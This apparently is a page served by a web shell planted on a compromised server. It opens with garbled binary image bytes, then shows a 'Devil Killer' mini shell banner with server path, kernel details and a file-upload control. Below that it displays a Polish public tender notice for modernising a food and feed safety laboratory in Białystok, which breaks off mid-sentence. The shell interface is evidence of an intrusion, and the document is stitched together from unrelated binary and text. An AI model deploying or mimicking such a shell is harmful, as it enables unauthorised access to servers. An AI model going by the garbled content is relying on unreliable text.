JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240905/0048708801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> modernizacja pomieszczeń Laboratorium Badania Bezpieczeństwa Żywności i Pasz w Białymstoku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">INSTYTUT OCHRONY ROŚLIN - PAŃSTWOWY INSTYTUT BADAWCZY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000080217</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Władysława Węgorka 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-318</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 61 864 90 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@iorpib.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.ior.poznan.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność naukowo-badawcza w zakresie ochrony roślin </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> modernizacja pomieszczeń Laboratorium Badania Bezpieczeństwa Żywności i Pasz w Białymstoku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bd2a0711-5154-4007-9afd-b45fa9268735</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00487088</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zakup współfinansowany jest w ramach inwestycji A2.4.1 inwestycje w rozbudowę potencjału badawczego, części inwestycji: budowa lub modernizacja laboratoriów instytutów nadzorowanych przez Ministra Rolnictwa i Rozwoju Wsi z KRAJOWEGO PLANU ODBUDOWYI ZWIĘKSZENIA ODPORNOŚCI (KPO). </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bd2a0711-5154-4007-9afd-b45fa9268735 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe zasady i warunki<br/>korzystania z Platformy e-Zamówienia(w tym minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z<br/>usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia) określa Regulamin dostępny na stronie<br/>internetowej pod linkiem: https://ezamowienia.gov.pl/pl/regulamin/<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia.<br/>5. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>6. Wymagania co do formatu danych, w jakim przekazywane są dokumenty:<br/>• Ofertę, oświadczenie wstępne, podmiotowe środki dowodowe, oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp,<br/>zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe oraz pełnomocnictwo sporządza się jako<br/>załączniki, w postaci elektronicznej, w formatach danych określonych w rozporządzeniu Rady Ministrów z 12 kwietnia 2012 r. w<br/>sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz.U.2017.2247 t.j.),<br/>• W zakresie kompresji (zmniejszenia objętości) dokumentów elektronicznych zamawiający dopuszcza poza formatami danych<br/>wymienionymi w rozporządzeniu w sprawie KRI również zastosowanie archiwum RAR (Roshal archive).<br/>• Inne dokumenty, informacje lub oświadczenia mogą zostać również sporządzone, jako tekst wpisany bezpośrednio do wiadomości i<br/>przekazane przy użyciu jednego ze wskazanych w treści SWZ środków komunikacji elektronicznej.<br/>• Komunikacja w postępowaniu odbywa się za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” (z<br/>wyjątkiem złożenia oferty), na Platformie e-zamówienia. System umożliwia dołączenie załącznika do przesyłanej wiadomości<br/>poprzez użycie przycisku „dodaj załącznik”.<br/>• Maksymalny rozmiar plików przesyłanych za pośrednictwem Formularzy do komunikacji” wynosi do 150 MB (rozmiar ten dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>• W przypadku załączników, które są opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym, może być zastosowany podpis typu zewnętrznego (wraz z wygenerowanym plikiem podpisu) lub typu wewnętrznego.<br/>• Korzystanie z funkcjonalności Formularzy do komunikacji w pełnym zakresie wymaga posiadania konta „Wykonawcy” oraz<br/>zalogowania się na Platformie e-Zamówienia.<br/>• Do korzystania z „Formularzy do komunikacji” służących do składania wniosków dotyczących treści dokumentów zamówienia<br/>wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>• Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania, w zakładce „Komunikacja”.<br/>• W przypadku występowania problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy<br/>mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22 458 77 99 lub drogą elektroniczną poprzez<br/>formularz udostępniony na stronie internetowej, w zakładce „Zgłoś problem”: https://ezamowienia.gov.pl/soz/latest-faq<br/>Dalsze informacje w pkt X SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Instytut Ochrony Roślin-PIB informuje, że:<br/>• administratorem Pani/Pana danych osobowych jest Instytut Ochrony Roślin-PIB, ul. Władysława Węgorka 20, 60-318 Poznań<br/>• w sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony Danych, kontakt pocztą elektroniczną<br/>na adres e-mail: iod@iorpib.poznan.pl<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowegopostępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania<br/>jest obowiązek<br/>prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na Zamawiającym;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>woparciu o art. 8 oraz art. 96 ust.3 ustawy Pzp a także art. 6 ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej;<br/>• Pani/Pana dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• Posiada Pan/Pani:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z<br/>prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie<br/>może naruszać integralności protokołu oraz jego załączników.<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia.<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Cd. informacji-zał. nr 6 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IORPIB/ZP/RB/Mod.Lab./Białystok/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest modernizacja pomieszczeń Laboratorium Badania Bezpieczeństwa Żywności i Pasz w Białymstoku. Ww. Laboratorium funkcjonuje w ramach Terenowej Stacji Doświadczalnej Instytutu Ochrony Roślin –PIB w Białymstoku (ul. Chełmońskiego 22, 15-195 Białystok).<br/>Ww. zadanie dotyczy realizacji inwestycji A2.4.1 inwestycje w rozbudowę potencjału badawczego, część inwestycji: budowa lub modernizacja laboratoriów instytutów nadzorowanych przez Ministra Rolnictwa i Rozwoju Wsi z Krajowego Planu Odbudowy i Zwiększania Odporności (KPO). <br/> UMOWA O OBJĘCIE PRZEDSIĘWZIĘCIA WSPARCIEM BEZZWROTNYM Z PLANU ROZWOJOWEGO NR IOR.KPOD.01.19-IP.04-0033/23<br/>Szczegółowy opis przedmiotu zamówienia zawarto w zał. nr 2 do SWZ – Opis Przedmiotu Zamówienia oraz w zał. nr 3: Program Funkcjonalno-użytkowy. <br/>Modernizacja będzie wykonana w formule zaprojektuj i wybuduj. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45442100-8 - Roboty malarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">44112100-9 - Wiaty</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował kryteriami: cena - całkowity koszt realizacji<br/>zamówienia 80%, termin realizacji zamówienia: 15 %, długość okresu gwarancji: 5%.<br/>2. Sposób punktacji.<br/>Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert przedstawione poniżej:<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>Nazwa kryterium Sposób punktacji: wg wzoru Sposób oceny<br/>Cena (całkowity koszt wykonania zamówienia) (a:b) x 100<br/>(a = najniższa zaoferowana cena<br/>brutto, b = cena brutto z badanej oferty) wartość punktowa uzyskana po zastosowaniu wzoru zostanie pomnożona przez znaczenie<br/>procentowe kryterium. Wynik odzwierciedli liczbę punktów uzyskaną przez badaną ofertę w kryterium - cena (całkowity koszt<br/>realizacji zamówienia).<br/>Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>Termin realizacji zamówienia (w dniach kalendarzowych). (a:b) x 100<br/>(a = najkrótszy zaoferowany termin realizacji zamówienia, b = termin realizacji zamówienia z badanej oferty z badanej oferty)<br/>Wartość punktowa uzyskana po zastosowaniu wzoru zostanie pomnożona przez znaczenie procentowe kryterium. Wynik<br/>odzwierciedli liczbę punktów uzyskaną przez badaną ofertę w kryterium - termin realizacji zamówienia.<br/>Podstawą przyznania punktów w kryterium „termin realizacji zamówienia” będzie termin realizacji zamówienia liczony od daty<br/>podpisania umowy podany przez Wykonawcę w Formularzu Ofertowym - w dniach.<br/>Zaoferowanie terminu dłuższego od maksymalnego wymaganego przez Zamawiającego (max. 180 dni) spowoduje odrzucenie<br/>oferty.<br/>Zaoferowanie terminu krótszego niż 112 dni spowoduje automatyczne przyznanie ofercie max. liczby punktów w tym kryterium.<br/>Długość okresu gwarancji ( w miesiącach) (a:b) x 100<br/>(a = okres gwarancji z badanej oferty<br/>brutto, b = najdłuższy zaoferowany okres gwarancji)<br/>wartość punktowa uzyskana po zastosowaniu wzoru zostanie pomnożona przez znaczenie procentowe kryterium. Wynik<br/>odzwierciedli liczbę punktów uzyskaną przez badaną ofertę w kryterium - Długość okresu gwarancji.<br/>Podstawą przyznania punktów w kryterium „Długość okresu gwarancji” będzie długość okresu gwarancji liczona od daty końcowego<br/>odbioru robót podana przez Wykonawcę w Formularzu Ofertowym - w miesiącach.<br/>Zaoferowanie gwarancji krótszej od minimalnej wymaganej przez Zamawiającego (60 m-cy) spowoduje odrzucenie oferty.<br/>W przypadku gdy Wykonawca zaoferuje okres gwarancji dłuższy niż 120 miesięcy, do obliczenia wartości punktowej Zamawiający<br/>przyzna automatycznie ofercie maksymalną liczbę punktów w tym kryterium.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą w bilansie 3 ww. kryteriów oceny<br/>ofert (największa suma punktów z trzech kryteriów).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia (w pełnych dniach)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji (w miesiącach)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający uzna, iż Wykonawca spełnia warunki udziału w postępowaniu, jeśli Wykonawca wykaże, w zakresie:<br/>a zdolności do występowania w obrocie gospodarczym - Zamawiający nie wyznacza szczegółowego warunku w tym<br/>zakresie,<br/>b kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów –<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>c sytuacji ekonomicznej lub finansowej – Zamawiający wyznacza szczegółowe warunki w tym zakresie i uzna, że<br/>Wykonawca spełnia warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu (wzór-zał. nr 4 do<br/>SWZ) oraz dostarczy dokument(y) potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1 mln zł<br/>(jeden milion złotych). Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganego przez Zamawiającego<br/>dokumentu Zamawiający dopuszcza złożenie przez Wykonawcę innego dokumentu, który w wystarczający sposób<br/>potwierdza spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu. Ocena spełniania warunku<br/>dokonywana będzie w oparciu o oświadczenie, dokument potwierdzający ubezpieczenie od oc złożone przez wykonawcę w<br/>niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia.<br/>d zdolności technicznej lub zawodowej Zamawiający wyznacza szczegółowe warunki w tym zakresie i uzna, że Wykonawca<br/>spełnia warunek jeżeli:<br/>• złoży oświadczenie o spełnieniu warunków udziału w postępowaniu (wzór-zał. nr 4 do SWZ) oraz<br/>• wykaże co najmniej 2 roboty tzn. budowa, modernizacja, przebudowa, rozbudowa, remont w zakresie: budynku<br/>użyteczności publicznej/obiektu badawczego/laboratorium/obiektu medycznego, o wartości min. 500 tys. zł brutto każda lub<br/>jedną o wartości 1 mln zł brutto, wykonane, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, dat i<br/>miejsc wykonania i podmiotów, na rzecz których roboty zostały wykonane oraz załączeniem dowodów określających, czy te<br/>roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (wzór 